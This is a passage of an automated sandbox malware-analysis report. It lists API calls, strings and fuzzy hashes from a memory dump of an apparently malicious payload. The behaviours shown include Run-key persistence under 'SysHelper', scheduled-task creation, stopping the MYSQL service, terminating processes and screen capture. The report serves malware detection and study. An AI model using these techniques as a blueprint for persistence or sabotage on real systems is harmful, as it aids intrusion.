                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F1198B
                                                                                                        • lstrcatW.KERNEL32(00000000,01000260), ref: 00F11993
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F11999
                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F119A3
                                                                                                        • _memset.LIBCMT ref: 00F119B8
                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00F119DC
                                                                                                          • Part of subcall function 00F12BA0: lstrlenW.KERNEL32(?), ref: 00F12BC9
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F11A01
                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F11A04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                        • String ID: failed with error
                                                                                                        • API String ID: 4182478520-946485432
                                                                                                        • Opcode ID: b80cb97fc40d3c54e0bd5c59238d1d4c115d338f1bfddc724636e5e1587ad4e3
                                                                                                        • Instruction ID: b43382048a42c7a4ad593959008ab4ee48ea5b5ac9ea25172c3e51526cf6d64c
                                                                                                        • Opcode Fuzzy Hash: b80cb97fc40d3c54e0bd5c59238d1d4c115d338f1bfddc724636e5e1587ad4e3
                                                                                                        • Instruction Fuzzy Hash: 5221B732A4021CBBE7116BA19C46FAE7A78EF85B51F100055FB09B7190DE741D41BBE5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F549A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00F54B72), ref: 00F549C7
                                                                                                          • Part of subcall function 00F549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F549D7
                                                                                                          • Part of subcall function 00F549A0: GetDesktopWindow.USER32 ref: 00F549FB
                                                                                                          • Part of subcall function 00F549A0: GetProcessWindowStation.USER32(?,00F54B72), ref: 00F54A01
                                                                                                          • Part of subcall function 00F549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F54B72), ref: 00F54A1C
                                                                                                          • Part of subcall function 00F549A0: GetLastError.KERNEL32(?,00F54B72), ref: 00F54A2A
                                                                                                          • Part of subcall function 00F549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F54B72), ref: 00F54A65
                                                                                                          • Part of subcall function 00F549A0: _wcsstr.LIBCMT ref: 00F54A8A
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F82316
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F82323
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F82338
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F82341
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00F8234E
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F8235C
                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00F8236E
                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00F823CA
                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00F823D6
                                                                                                        • SelectObject.GDI32(?,?), ref: 00F82436
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F8243D
                                                                                                        • DeleteDC.GDI32(?), ref: 00F8244A
                                                                                                        • DeleteDC.GDI32(?), ref: 00F82450
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                        • API String ID: 151064509-1805842116
                                                                                                        • Opcode ID: 5a2b73211f98593a0215d7fcab6afe7f55c506450433e6ab82b4bcedf562a70f
                                                                                                        • Instruction ID: 7d81cac7654ac4224bd60ee493053d412c548c15a426e85beb76423003ec494b
                                                                                                        • Opcode Fuzzy Hash: 5a2b73211f98593a0215d7fcab6afe7f55c506450433e6ab82b4bcedf562a70f
                                                                                                        • Instruction Fuzzy Hash: 7C419671944304EBD310AB759D46F6FBBF8FF89710F000519FA54D72A1E775A800ABA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                        • API String ID: 909875538-2733969777
                                                                                                        • Opcode ID: 232e13fa1c4e14f054986050090cb4371b5f88172dad2856e098ae14ae4edf98
                                                                                                        • Instruction ID: 4484e46529c5fcc12cb083a9eaade3db982493028d2446f7d97bcf13f84f792b
                                                                                                        • Opcode Fuzzy Hash: 232e13fa1c4e14f054986050090cb4371b5f88172dad2856e098ae14ae4edf98
                                                                                                        • Instruction Fuzzy Hash: 20F1EA72A083416BE721EA64DC42F9BB7D89F55714F040829FE8CD7283E774DA09A793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503006713-0
                                                                                                        • Opcode ID: c92b08680f84de9bed78b7d46287e37ac731e50126827fd776372008fcd7e3f9
                                                                                                        • Instruction ID: 8220ec487cf029e0ad4324a6fa0f2ba028da4ce0e4c50ab7049f521e048427ee
                                                                                                        • Opcode Fuzzy Hash: c92b08680f84de9bed78b7d46287e37ac731e50126827fd776372008fcd7e3f9
                                                                                                        • Instruction Fuzzy Hash: 88219F36509A31ABE7217F64FC03E1EBBD4DF81B61F244429F484990A2EF799810BB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F11BB0
                                                                                                        • CoCreateInstance.OLE32(00FCE908,00000000,00000001,00FCD568,00000000), ref: 00F11BC8
                                                                                                        • CoUninitialize.OLE32 ref: 00F11BD0
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00F11C12
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00F11C22
                                                                                                        • lstrcatW.KERNEL32(?,01000050), ref: 00F11C3A
                                                                                                        • lstrcatW.KERNEL32(?), ref: 00F11C44
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00F11C68
                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00F11C7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                        • String ID: \shell32.dll
                                                                                                        • API String ID: 679253221-3783449302
                                                                                                        • Opcode ID: 448aeebdff63bf5f404cfbbe593098637e66f007c97e8acd803bc219647af975
                                                                                                        • Instruction ID: c6a92ec43bbbbf76a5387ee818713c7890548c208b779ef269f906cb427b3483
                                                                                                        • Opcode Fuzzy Hash: 448aeebdff63bf5f404cfbbe593098637e66f007c97e8acd803bc219647af975
                                                                                                        • Instruction Fuzzy Hash: E6413D70A4021DAFDB10DBA4DD89FEA7BBCEF48705F004499F609DB190D6B1AA85DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00F54B72), ref: 00F549C7
                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F549D7
                                                                                                        • GetDesktopWindow.USER32 ref: 00F549FB
                                                                                                        • GetProcessWindowStation.USER32(?,00F54B72), ref: 00F54A01
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F54B72), ref: 00F54A1C
                                                                                                        • GetLastError.KERNEL32(?,00F54B72), ref: 00F54A2A
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F54B72), ref: 00F54A65
                                                                                                        • _wcsstr.LIBCMT ref: 00F54A8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                        • Opcode ID: 42f86b8ce5b4b255450407ff41d538b6734e671bd03f42516cfa306865ad789d
                                                                                                        • Instruction ID: 0f8a0f2428d5d546389e52abd9e67130253fd2b778374128fdddcba4f85a9494
                                                                                                        • Opcode Fuzzy Hash: 42f86b8ce5b4b255450407ff41d538b6734e671bd03f42516cfa306865ad789d
                                                                                                        • Instruction Fuzzy Hash: 3A313C31E402089BDB20DFB9EC46BAE7778EF44325F100256FD1AD71D0EB38A9449B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F4,00F54C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F5480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00F51D37,00000000,00F0CDAE,00000001,00000001), ref: 00F54AFA
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00F54B05
                                                                                                        • __vfwprintf_p.LIBCMT ref: 00F54B27
                                                                                                          • Part of subcall function 00F2BDCC: _vfprintf_helper.LIBCMT ref: 00F2BDDF
                                                                                                        • vswprintf.LIBCMT ref: 00F54B5D
                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00F54B7E
                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00F54BA2
                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00F54BA9
                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00F54BD3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                        • API String ID: 277090408-1348657634
                                                                                                        • Opcode ID: 720fe4ba42480d3ce5ab2f0d158243e5ff1d1cf073aaa297c3f9bddfbd69fd03
                                                                                                        • Instruction ID: 7dcd92b1c95910ede3f35dc60f4e9e193f19de70845ccc765c6f1a885e894920
                                                                                                        • Opcode Fuzzy Hash: 720fe4ba42480d3ce5ab2f0d158243e5ff1d1cf073aaa297c3f9bddfbd69fd03
                                                                                                        • Instruction Fuzzy Hash: FC21D771A48304BBE771A760DC47FEB7798AF98700F444819FA99C61D0EAB89444A793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F12389
                                                                                                        • _memset.LIBCMT ref: 00F123B6
                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00F123DE
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F123E7
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F123F4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F123FF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1240E
                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00F12422
                                                                                                        Strings
                                                                                                        • SysHelper, xrefs: 00F123D6
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00F1237F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                        • API String ID: 122392481-4165002228
                                                                                                        • Opcode ID: 712a35411257d4295f6a2b29035a4ab753fc745c91611aaee5e18e32767cae59
                                                                                                        • Instruction ID: 3a5c88f668f11bca9b33d65a43266547eec259b823e46e860892b0c1befebb53
                                                                                                        • Opcode Fuzzy Hash: 712a35411257d4295f6a2b29035a4ab753fc745c91611aaee5e18e32767cae59
                                                                                                        • Instruction Fuzzy Hash: 9E11267294020DABDF10DFA0DD4AFEE77BCBB04705F0445A5F649E2151DBB4AA88AB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F0DAEB
                                                                                                        • CoCreateInstance.OLE32(00FD4F6C,00000000,00000001,00FD4F3C,?,?,00FCA948,000000FF), ref: 00F0DB0B
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F0DBD6
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00FCA948,000000FF), ref: 00F0DBE3
                                                                                                        • _memset.LIBCMT ref: 00F0DC38
                                                                                                        • CoUninitialize.OLE32 ref: 00F0DC92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00F11A1D
                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00F11A32
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00F11A46
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F11A5B
                                                                                                        • Sleep.KERNEL32(?), ref: 00F11A75
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F11A80
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F11A9E
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F11AA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                        • String ID: MYSQL
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • std::exception::exception.LIBCMT ref: 00F4F27F
                                                                                                          • Part of subcall function 00F30CFC: std::exception::_Copy_str.LIBCMT ref: 00F30D15
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F4F294
                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        • std::exception::exception.LIBCMT ref: 00F4F2AD
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F4F2C2
                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00F4F2D4
                                                                                                          • Part of subcall function 00F4EF74: std::exception::exception.LIBCMT ref: 00F4EF8E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F4F2E2
                                                                                                        • std::exception::exception.LIBCMT ref: 00F4F2FB
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F4F310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                        • String ID: bad function call
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F235B1
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F2364A
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F23680
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F2369D
                                                                                                        • __allrem.LIBCMT ref: 00F236F3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F2370F
                                                                                                        • __allrem.LIBCMT ref: 00F23726
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F23744
                                                                                                        • __allrem.LIBCMT ref: 00F2375B
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F23779
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                        • String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00F654C8
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F654D4
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00F654F7
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F65503
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00F65531
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00F6555B
                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00F655F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                        • Opcode ID: 7e2ecf9ed7d3ca3afe55606acc7b34aede3e4ffff278d03e15ca079eeae175fc
                                                                                                        • Instruction ID: d3b70f774cac12ec42987871fee35968fac65d3c3251f9320190a278185941cb
                                                                                                        • Opcode Fuzzy Hash: 7e2ecf9ed7d3ca3afe55606acc7b34aede3e4ffff278d03e15ca079eeae175fc
                                                                                                        • Instruction Fuzzy Hash: ED514C71E80718BBEB206B64DC07FBE7769AF05F20F040025FE06BB1C1D6655D05A6A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F1244F
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F12469
                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F124A1
                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00F124B0
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F124B7
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F124C1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F124CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
